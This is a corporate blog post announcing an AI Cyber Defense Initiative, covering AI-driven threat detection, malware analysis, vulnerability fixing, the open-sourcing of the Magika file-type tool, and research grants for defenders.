Skip to main content
The Keyword

How AI can strengthen digital security

a series of lines converging into a pyramid

Today, many seasoned security professionals will tell you they’ve been fighting a constant battle against cybercriminals and state-sponsored attackers. They will also tell you that any clear-eyed assessment shows that most of the patches, preventative measures and public awareness campaigns can only succeed at mitigating yesterday’s threats — not the threats waiting in the wings.

That could be changing. As the world focuses on the potential of AI — and governments and industry work on a regulatory approach to ensure AI is safe and secure — we believe that AI represents an inflection point for digital security. We’re not alone. More than 40% of people view better security as a top application for AI — and it’s a topic that will be front and center at the Munich Security Conference this weekend.

AI is at a definitive crossroads — one where policymakers, security professionals and civil society have the chance to finally tilt the cybersecurity balance from attackers to cyber defenders. At a moment when malicious actors are experimenting with AI, we need bold and timely action to shape the direction of this technology. To support this work, today we’re launching a new AI Cyber Defense Initiative, including a proposed policy and technology agenda contained in our new report: Secure, Empower, Advance: How AI Can Reverse the Defender’s Dilemma.

How to tilt the cybersecurity balance from attackers to defenders

Today, and for decades, the main challenge in cybersecurity has been that attackers need just one successful, novel threat to break through the best defenses. Defenders, meanwhile, need to deploy the best defenses at all times, across increasingly complex digital terrain — and there’s no margin for error. This is the “Defender's Dilemma,” and there’s never been a reliable way to tip that balance.

Our experience deploying AI at scale informs our belief that AI can actually reverse this dynamic. AI allows security professionals and defenders to scale their work in threat detection, malware analysis, vulnerability detection, vulnerability fixing and incident response.

  • a text card that reads: Threat detection: Gmail uses RETVec, a new multilingual neuro-based text processing model, which improved spam detection rates by nearly 40% and reduced false positives by more than 19%.
  • a text card that reads: Malware analysis: VirusTotal uses AI to review potentially malicious files. Recent research from VirusTotal shows that AI yields 70% better detection rates for malicious scripts and up to 300% improved ability to identify files which exploit vulnerabilities.
  • A text card that reads: Vulnerability detection: Our Open Source Security team has been leveraging Gemini to improve code coverage of open source projects for our fuzzer, resulting in coverage increases of up to 30% across more than 120 projects, leading to the detection of new vulnerabilities.
  • A text card that reads: Vulnerability fixing: We harnessed our Gemini model to successfully fix 15% of bugs discovered by our sanitizer tools during testing, resulting in hundreds of bugs patched. We expect this success rate to continually improve and anticipate that LLMs can be used to fix bugs in various languages across the software development lifecycle.
  • A text card that reads: Incident response: Internally, our Detection & Response teams have begun applying generative AI to generate incident summaries. As a result, our teams are seeing 51% time savings and higher quality results in incident analyst output.

Three ways we’re applying AI to security while supporting others

Through the AI Cyber Defense Initiative, we’re continuing our investment in an AI-ready infrastructure, releasing new tools for defenders, and launching new research and AI security training. These commitments are designed to help AI secure, empower and advance our collective digital future.

1. Secure. We believe AI security technologies, just like other technologies, need to be secure by design and by default – or they could further deepen the Defender’s Dilemma. This is why we started the Secure AI Framework as a vehicle to collaborate on best practices for securing AI systems. To build on these efforts to foster a more secure AI ecosystem:

  • We continue to invest in our secure, AI-ready network of global data centers. To help turn the tide in cyberspace, we need to make new AI innovations available to public sector organizations and businesses of all sizes across industries. Over the period 2019 to end 2024, we will have invested over $5 billion in data centers in Europe — helping support secure, reliable access to a range of digital services, including broad generative AI capabilities like our Vertex AI platform.
  • We’re announcing a new “AI for Cybersecurity” cohort of 17 startups from the UK, US and EU under the Google for Startups Growth Academy’s AI for Cybersecurity Program. This will help strengthen the transatlantic cybersecurity ecosystem with internationalization strategies, AI tools, and the skills to use them.

2. Empower. AI governance choices made today can shift the terrain in cyberspace in unintended ways. Our societies need a balanced regulatory approach to AI usage and adoption to avoid a future where attackers can innovate but defenders cannot. We need targeted investments, partnerships between industry and government, and effective regulatory approaches to empower organizations to maximize the value from AI while limiting utility to adversaries. To help give defenders the upper hand in this fight:

  • We’re expanding our $15 million Google.org Cybersecurity Seminars Program to cover all of Europe, initially announced at GSEC Malaga last year. The program, which includes AI-focused modules, supports universities to train the next generation of cybersecurity experts from underserved communities.
  • We’re open-sourcing Magika, a new, AI-powered tool to aid defenders through file type identification, an essential part of detecting malware. Magika is already used to help protect products including Gmail, Drive and Safe Browsing, as well as by our VirusTotal team to foster a safer digital environment. Magika outperforms conventional file identification methods providing an overall 30% accuracy boost and up to 95% higher precision on traditionally hard to identify, but potentially problematic content such as VBA, JavaScript and Powershell.

3. Advance. We’re committed to advancing research that helps generate breakthroughs in AI-powered security. To support this effort, we’re announcing $2 million in research grants and strategic partnerships that will help strengthen cybersecurity research initiatives using AI, including enhancing code verification, improving understanding of how AI can help with cyber offense and countermeasures for defense, and developing large language models that are more resilient to threats. The funding is supporting researchers at institutions including The University of Chicago, Carnegie Mellon and Stanford. This builds on our ongoing efforts to stimulate the cybersecurity ecosystem, including our $12 million commitment to the New York research system last year.

The AI revolution is already underway. While people rightly applaud the promise of new medicines and scientific breakthroughs, we’re also excited about AI’s potential to solve generational security challenges while bringing us close to the safe, secure and trusted digital world we deserve.

a graphic that reads "Roadmap for Reversing the Defender's Dilemma"

See our report for a detailed roadmap showing how prioritized technical, research, and policy enablers can maximize the advantage for defenders and hinder the attackers.